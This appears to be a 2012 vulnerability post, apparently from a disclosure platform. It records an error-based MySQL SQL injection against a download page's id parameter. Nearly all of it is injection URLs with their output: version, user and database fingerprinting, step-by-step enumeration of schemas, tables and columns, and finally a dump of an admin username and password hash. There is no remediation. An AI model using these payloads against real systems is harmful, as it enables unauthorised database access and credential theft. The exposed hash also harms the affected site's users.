PHP + MySQL advanced error-based injection, tested and confirmed working

Posted on 2012-9-13 17:52:09
http://www.wooyun.org/bugs/wooyun-2010-01666

I had been wanting to find something to test this on and did not expect there to be one here. It can be tested; this is just for the record.

http://xxoo/download/downpage/netarea/id/1600003'+and+(select+1+from(select+count(*),concat(0x7c,(select+(Select+version())+from+information_schema.tables+limit+0,1),0x7c,floor(rand(0)*2))x+from+information_schema.tables+group+by+x+limit+0,1)a)%23/wapc/5000_0005_003

/data0/htdocs/leqi_new/app/myapp.php

Or

/**********version()**********/ 5.1.49-log
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+version()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003

/**********user()**********/
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003

/**********database()**********/  leqi
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+database()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003

/**********step through with limit to enumerate database names**********/
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
information_schema
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
leqi
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+2,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
test

/**********step through with limit to enumerate table names**********/
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+table_name+from+information_schema.tables+where+table_schema=0x6C657169+limit+200,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
users

/**********step through with limit to enumerate column names**********/
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+column_name+from+information_schema.columns+where+table_schema=0x6C657169+and+table_name=0x7573657273+limit+3,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
user_id,username,nickname,passwd,group_id
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+group_id+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
11 21
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user_id+from+users+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
11 341 351 361
/**********dump data**********/
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+username+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
admin
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+passwd+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
6a8b4574ca231eb8bd52764d4978ffcd